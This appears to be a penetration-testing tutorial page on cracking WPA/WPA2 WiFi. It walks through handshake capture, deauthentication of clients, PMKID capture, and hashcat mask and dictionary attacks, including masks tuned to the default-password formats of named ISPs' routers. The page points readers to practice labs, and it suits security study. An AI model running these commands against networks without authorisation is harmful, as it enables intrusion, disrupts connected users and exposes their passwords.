WPA/WPA2 Cracking
WPA2-PSK is the most common home WiFi security. Attacks focus on capturing the 4-way handshake or PMKID and cracking it offline.
WiFi-Specific Cracking Strategy
Generic wordlists often miss WiFi passwords. Supplement with:
ISP default patterns (e.g. BT Hub: 10 lowercase letters), SSID-derived masks
(
hashcat --stdout -a 3 ?d?d?d?d?d?d?d?d | aircrack-ng ...),
and targeted rules like best64.rule + toggles.rule.
Prefer PMKID capture over deauth — it's clientless and stealthier.
📑 Table of Contents
4-Way Handshake Capture
Step 1: Start capture on the target network.
bash
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0monsudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon
Step 2: Deauthenticate a client to force reconnection.
-0: deauth attack, 5: number of deauths, -a: target AP BSSID, -c: target client MAC.
bash
# In another terminal:
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0mon# In another terminal:
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0monStep 3: Wait for "WPA handshake: AA:BB:CC:DD:EE:FF" in airodump. Verify the handshake was captured.
bash
aircrack-ng handshake-01.capaircrack-ng handshake-01.capStep 4: Crack with a wordlist using aircrack-ng.
bash
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF handshake-01.capaircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF handshake-01.capGPU cracking with Hashcat is much faster. First, convert the capture to hashcat format.
bash
# Option 1: Using aircrack-ng
aircrack-ng -j handshake handshake-01.cap
# Option 2: Using hcxpcapngtool
hcxpcapngtool -o handshake.hc22000 handshake-01.cap# Option 1: Using aircrack-ng
aircrack-ng -j handshake handshake-01.cap
# Option 2: Using hcxpcapngtool
hcxpcapngtool -o handshake.hc22000 handshake-01.capCrack with hashcat using mode 22000 (WPA-PBKDF2-PMKID+EAPOL).
bash
hashcat -m 22000 handshake.hc22000 /usr/share/wordlists/rockyou.txthashcat -m 22000 handshake.hc22000 /usr/share/wordlists/rockyou.txtUse rules for better coverage.
bash
hashcat -m 22000 handshake.hc22000 wordlist.txt -r /usr/share/hashcat/rules/best64.rulehashcat -m 22000 handshake.hc22000 wordlist.txt -r /usr/share/hashcat/rules/best64.rulePMKID Attack (Clientless)
PMKID Attack Overview: Discovered in 2018, this attack extracts the Pairwise Master Key Identifier from the first frame of the 4-way handshake (EAPOL frame 1). No client needed, no handshake required - just association with the AP.
Why PMKID Works
The PMKID is calculated as: HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)
Since MAC addresses are known, we can brute force the PMK (Pairwise Master Key) which is derived from the PSK (Pre-Shared Key / WiFi password).
Step 1: Capture PMKID with hcxdumptool (modern method).
bash
# Install hcxdumptool and hcxtools
sudo apt install hcxdumptool hcxtools
# Capture PMKID (no monitor mode required!)
sudo hcxdumptool -i wlan0 -o pmkid.pcapng --enable_status=15
# Target specific network
sudo hcxdumptool -i wlan0 -o pmkid.pcapng --filterlist_ap=targets.txt --filtermode=2
# Create targets.txt with AP MAC addresses (one per line):
# AA:BB:CC:DD:EE:FF
# 11:22:33:44:55:66# Install hcxdumptool and hcxtools
sudo apt install hcxdumptool hcxtools
# Capture PMKID (no monitor mode required!)
sudo hcxdumptool -i wlan0 -o pmkid.pcapng --enable_status=15
# Target specific network
sudo hcxdumptool -i wlan0 -o pmkid.pcapng --filterlist_ap=targets.txt --filtermode=2
# Create targets.txt with AP MAC addresses (one per line):
# AA:BB:CC:DD:EE:FF
# 11:22:33:44:55:66Step 2: Extract PMKID and convert to hashcat format.
bash
# Convert to hashcat 22000 format
hcxpcapngtool -o pmkid.hc22000 pmkid.pcapng
# Check if PMKID was captured
cat pmkid.hc22000 | grep "^WPA\*02"
# Output format: WPA*02*PMKID*MAC_AP*MAC_STA*ESSID# Convert to hashcat 22000 format
hcxpcapngtool -o pmkid.hc22000 pmkid.pcapng
# Check if PMKID was captured
cat pmkid.hc22000 | grep "^WPA\*02"
# Output format: WPA*02*PMKID*MAC_AP*MAC_STA*ESSIDStep 3: Crack PMKID with hashcat.
bash
# Basic dictionary attack
hashcat -m 22000 pmkid.hc22000 /usr/share/wordlists/rockyou.txt
# With rules (best64)
hashcat -m 22000 pmkid.hc22000 wordlist.txt -r /usr/share/hashcat/rules/best64.rule
# Mask attack (8 digits)
hashcat -m 22000 pmkid.hc22000 -a 3 ?d?d?d?d?d?d?d?d
# Hybrid attack (wordlist + digits)
hashcat -m 22000 pmkid.hc22000 -a 6 wordlist.txt ?d?d?d?d
# Show cracked passwords
hashcat -m 22000 pmkid.hc22000 --show# Basic dictionary attack
hashcat -m 22000 pmkid.hc22000 /usr/share/wordlists/rockyou.txt
# With rules (best64)
hashcat -m 22000 pmkid.hc22000 wordlist.txt -r /usr/share/hashcat/rules/best64.rule
# Mask attack (8 digits)
hashcat -m 22000 pmkid.hc22000 -a 3 ?d?d?d?d?d?d?d?d
# Hybrid attack (wordlist + digits)
hashcat -m 22000 pmkid.hc22000 -a 6 wordlist.txt ?d?d?d?d
# Show cracked passwords
hashcat -m 22000 pmkid.hc22000 --showAlternative: Use Bettercap to trigger PMKID capture.
bash
sudo bettercap -iface wlan0mon
> wifi.recon on
> wifi.show
# Associate with target AP to trigger PMKID
> wifi.assoc AA:BB:CC:DD:EE:FF
# PMKID will be saved in bettercap session
> set wifi.handshakes.file pmkid.pcapsudo bettercap -iface wlan0mon
> wifi.recon on
> wifi.show
# Associate with target AP to trigger PMKID
> wifi.assoc AA:BB:CC:DD:EE:FF
# PMKID will be saved in bettercap session
> set wifi.handshakes.file pmkid.pcapAdvanced Cracking Techniques
Combinator Attack: Combine two wordlists.
bash
# Combine words from two lists
hashcat -m 22000 handshake.hc22000 -a 1 wordlist1.txt wordlist2.txt
# Example: "password" + "123" = "password123"# Combine words from two lists
hashcat -m 22000 handshake.hc22000 -a 1 wordlist1.txt wordlist2.txt
# Example: "password" + "123" = "password123"Rainbow Tables: Pre-computed hashes for common SSIDs.
bash
# Generate rainbow table for specific SSID
genpmk -f wordlist.txt -d rainbow.db -s "SSID_NAME"
# Use cowpatty with rainbow table
cowpatty -d rainbow.db -r handshake-01.cap -s "SSID_NAME"
# Note: SSID is part of the PMK calculation, so rainbow tables
# are SSID-specific (Common SSIDs: "linksys", "default", "NETGEAR")# Generate rainbow table for specific SSID
genpmk -f wordlist.txt -d rainbow.db -s "SSID_NAME"
# Use cowpatty with rainbow table
cowpatty -d rainbow.db -r handshake-01.cap -s "SSID_NAME"
# Note: SSID is part of the PMK calculation, so rainbow tables
# are SSID-specific (Common SSIDs: "linksys", "default", "NETGEAR")Incremental Mask Attack: Target specific password patterns.
bash
# Format: SSID + 4 digits (common for many routers)
hashcat -m 22000 handshake.hc22000 -a 3 MyWiFi?d?d?d?d
# Year patterns (2020-2024)
hashcat -m 22000 handshake.hc22000 -a 3 ?l?l?l?l202?d
# Phone number patterns (XXX-XXXX)
hashcat -m 22000 handshake.hc22000 -a 3 ?d?d?d-?d?d?d?d
# Custom charset (lowercase + numbers only)
hashcat -m 22000 handshake.hc22000 -a 3 -1 ?l?d ?1?1?1?1?1?1?1?1# Format: SSID + 4 digits (common for many routers)
hashcat -m 22000 handshake.hc22000 -a 3 MyWiFi?d?d?d?d
# Year patterns (2020-2024)
hashcat -m 22000 handshake.hc22000 -a 3 ?l?l?l?l202?d
# Phone number patterns (XXX-XXXX)
hashcat -m 22000 handshake.hc22000 -a 3 ?d?d?d-?d?d?d?d
# Custom charset (lowercase + numbers only)
hashcat -m 22000 handshake.hc22000 -a 3 -1 ?l?d ?1?1?1?1?1?1?1?1Distribution Cracking: Use multiple GPUs or cloud instances.
bash
# Limit keyspace for distribution
# Instance 1: crack first 50% of keyspace
hashcat -m 22000 handshake.hc22000 wordlist.txt --skip=0 --limit=5000000
# Instance 2: crack second 50%
hashcat -m 22000 handshake.hc22000 wordlist.txt --skip=5000000
# Restore session if interrupted
hashcat -m 22000 handshake.hc22000 wordlist.txt --session=session1 --restore# Limit keyspace for distribution
# Instance 1: crack first 50% of keyspace
hashcat -m 22000 handshake.hc22000 wordlist.txt --skip=0 --limit=5000000
# Instance 2: crack second 50%
hashcat -m 22000 handshake.hc22000 wordlist.txt --skip=5000000
# Restore session if interrupted
hashcat -m 22000 handshake.hc22000 wordlist.txt --session=session1 --restore⚠️ PMKID Limitations
- • Not all routers/APs support PMKID (patched in newer firmware)
- • Roaming enabled APs more likely to have PMKID
- • If PMKID fails, fall back to traditional 4-way handshake
- • WPA3 (SAE) does not use PMKID
Hashcat Mode Reference
Hashcat supports multiple WiFi-related hash modes. Use the correct mode for your capture format.
| Mode | Name | Use Case | Input Format |
|---|---|---|---|
| 22000 | WPA-PBKDF2-PMKID+EAPOL | Modern unified mode — handles both PMKID and 4-way handshakes | .hc22000 (hcxpcapngtool) |
| 22001 | WPA-PMK-PMKID+EAPOL | Crack using raw PMK (skip PBKDF2) — use if you have the PMK already | .hc22000 |
| 16800 | WPA-PMKID-PBKDF2 (legacy) | PMKID-only captures — older format, superseded by 22000 | .16800 (hcxpcaptool) |
| 2500 | WPA-EAPOL-PBKDF2 (legacy) | 4-way handshake only — legacy format, use 22000 instead | .hccapx (cap2hccapx) |
| 5500 | NetNTLMv1 / MSCHAPv2 | WPA-Enterprise captured credentials (EAP-MSCHAP) | user::domain:hash |
| 5600 | NetNTLMv2 | WPA-Enterprise NTLMv2 credentials | user::domain:hash |
bash
# Convert captures to modern format (always use 22000)
hcxpcapngtool -o output.hc22000 capture.pcapng
# Check what was extracted
cat output.hc22000 | head -5
# WPA*01* = PMKID hash
# WPA*02* = EAPOL hash
# Legacy format conversion (if you have old .cap files)
# cap → hccapx (mode 2500, deprecated)
cap2hccapx capture.cap output.hccapx
# hccapx → hc22000 (upgrade to modern format)
hcxpcapngtool -o output.hc22000 --hccapx=input.hccapx# Convert captures to modern format (always use 22000)
hcxpcapngtool -o output.hc22000 capture.pcapng
# Check what was extracted
cat output.hc22000 | head -5
# WPA*01* = PMKID hash
# WPA*02* = EAPOL hash
# Legacy format conversion (if you have old .cap files)
# cap → hccapx (mode 2500, deprecated)
cap2hccapx capture.cap output.hccapx
# hccapx → hc22000 (upgrade to modern format)
hcxpcapngtool -o output.hc22000 --hccapx=input.hccapxISP Default Password Patterns
Many ISP-supplied routers use predictable default WiFi passwords. Target these patterns with mask attacks instead of generic wordlists — it's dramatically more effective.
bash
# ==========================================
# BT Home Hub (UK) — 10 lowercase letters
# ==========================================
# Pattern: [a-z]{10} (e.g., "abcdefghij")
# Keyspace: 26^10 ≈ 141 trillion — too large for pure brute force
# Strategy: Use wordlist + BT-specific rule files
hashcat -m 22000 handshake.hc22000 -a 3 ?l?l?l?l?l?l?l?l?l?l
# Better: Use BT-specific wordlists from SecLists
# ==========================================
# Sky Broadband (UK) — 8 uppercase letters
# ==========================================
# Pattern: [A-Z]{8} (e.g., "ABCDEFGH")
# Keyspace: 26^8 ≈ 208 billion — crackable on high-end GPU
hashcat -m 22000 handshake.hc22000 -a 3 ?u?u?u?u?u?u?u?u
# ==========================================
# Virgin Media Super Hub (UK) — 8 lowercase letters
# ==========================================
hashcat -m 22000 handshake.hc22000 -a 3 ?l?l?l?l?l?l?l?l
# ==========================================
# Xfinity/Comcast (US) — "YOURSSID" + 3 digits or word+digits
# ==========================================
# Defaults often match: [word][3-4 digits]
hashcat -m 22000 handshake.hc22000 -a 6 wordlist.txt ?d?d?d?d
# ==========================================
# AT&T U-verse / BGW210 — 10 digit numeric
# ==========================================
hashcat -m 22000 handshake.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d
# ==========================================
# Spectrum (US) — 8 lowercase alphanumeric
# ==========================================
hashcat -m 22000 handshake.hc22000 -a 3 -1 ?l?d ?1?1?1?1?1?1?1?1
# ==========================================
# Deutsche Telekom Speedport (DE) — 16 hex digits
# ==========================================
hashcat -m 22000 handshake.hc22000 -a 3 -1 0123456789abcdef ?1?1?1?1?1?1?1?1?1?1?1?1?1?1?1?1
# ==========================================
# UPC/Ziggo (EU) — 8 uppercase alphanumeric (UPC prefix)
# ==========================================
# Default SSID: UPC1234567, Password: [A-Z]{8}
hashcat -m 22000 handshake.hc22000 -a 3 ?u?u?u?u?u?u?u?u
# ==========================================
# Vodafone Station (IT/DE) — 10 hex digits
# ==========================================
hashcat -m 22000 handshake.hc22000 -a 3 -1 0123456789ABCDEF ?1?1?1?1?1?1?1?1?1?1# ==========================================
# BT Home Hub (UK) — 10 lowercase letters
# ==========================================
# Pattern: [a-z]{10} (e.g., "abcdefghij")
# Keyspace: 26^10 ≈ 141 trillion — too large for pure brute force
# Strategy: Use wordlist + BT-specific rule files
hashcat -m 22000 handshake.hc22000 -a 3 ?l?l?l?l?l?l?l?l?l?l
# Better: Use BT-specific wordlists from SecLists
# ==========================================
# Sky Broadband (UK) — 8 uppercase letters
# ==========================================
# Pattern: [A-Z]{8} (e.g., "ABCDEFGH")
# Keyspace: 26^8 ≈ 208 billion — crackable on high-end GPU
hashcat -m 22000 handshake.hc22000 -a 3 ?u?u?u?u?u?u?u?u
# ==========================================
# Virgin Media Super Hub (UK) — 8 lowercase letters
# ==========================================
hashcat -m 22000 handshake.hc22000 -a 3 ?l?l?l?l?l?l?l?l
# ==========================================
# Xfinity/Comcast (US) — "YOURSSID" + 3 digits or word+digits
# ==========================================
# Defaults often match: [word][3-4 digits]
hashcat -m 22000 handshake.hc22000 -a 6 wordlist.txt ?d?d?d?d
# ==========================================
# AT&T U-verse / BGW210 — 10 digit numeric
# ==========================================
hashcat -m 22000 handshake.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d
# ==========================================
# Spectrum (US) — 8 lowercase alphanumeric
# ==========================================
hashcat -m 22000 handshake.hc22000 -a 3 -1 ?l?d ?1?1?1?1?1?1?1?1
# ==========================================
# Deutsche Telekom Speedport (DE) — 16 hex digits
# ==========================================
hashcat -m 22000 handshake.hc22000 -a 3 -1 0123456789abcdef ?1?1?1?1?1?1?1?1?1?1?1?1?1?1?1?1
# ==========================================
# UPC/Ziggo (EU) — 8 uppercase alphanumeric (UPC prefix)
# ==========================================
# Default SSID: UPC1234567, Password: [A-Z]{8}
hashcat -m 22000 handshake.hc22000 -a 3 ?u?u?u?u?u?u?u?u
# ==========================================
# Vodafone Station (IT/DE) — 10 hex digits
# ==========================================
hashcat -m 22000 handshake.hc22000 -a 3 -1 0123456789ABCDEF ?1?1?1?1?1?1?1?1?1?1GPU Cracking Performance
WPA2 uses PBKDF2-SHA1 with 4,096 iterations, making each password guess computationally expensive. Know your hardware capabilities to estimate cracking time. Below are approximate WPA2 cracking speeds (hashcat mode 22000):
| GPU | Speed (H/s) | rockyou.txt (14M) | 8-digit numeric | 8-char lowercase |
|---|---|---|---|---|
| RTX 4090 | ~2.5M H/s | ~6 seconds | ~40 seconds | ~34 hours |
| RTX 3090 | ~1.4M H/s | ~10 seconds | ~71 seconds | ~60 hours |
| RTX 3080 | ~1.0M H/s | ~14 seconds | ~100 seconds | ~84 hours |
| RTX 2080 Ti | ~680K H/s | ~21 seconds | ~2.5 minutes | ~5 days |
| GTX 1080 | ~400K H/s | ~35 seconds | ~4 minutes | ~8 days |
| Cloud (8× A100) | ~15M H/s | <1 second | ~7 seconds | ~6 hours |
| CPU (i7-12700K) | ~30K H/s | ~8 minutes | ~55 minutes | ~280 days |
Performance Tips
- • Run
hashcat -b -m 22000to benchmark your specific hardware - • NVIDIA GPUs outperform AMD for WPA2 (PBKDF2-SHA1 optimization)
- • Minimum 8 GB VRAM recommended; 4 GB works but limits wordlist size
- • Use
-w 3(workload profile: insane) for maximum speed on dedicated rigs - • Multi-GPU: hashcat auto-distributes across all detected GPUs
- • Cloud option: AWS p3.16xlarge (8× V100) or Vast.ai for rental GPUs
🎯
WPA Cracking Practice
Practice WPA2 handshake capture, PMKID extraction, and hashcat cracking in safe lab environments.
🏠
Open Lab
WiFi Hacking 101 TryHackMe easy
WPA handshake captureaircrack-ngdeauth + airodump
🔧
WPA Cracking Lab Custom Lab medium
PMKID extractionhashcat rules & maskshcxtools conversion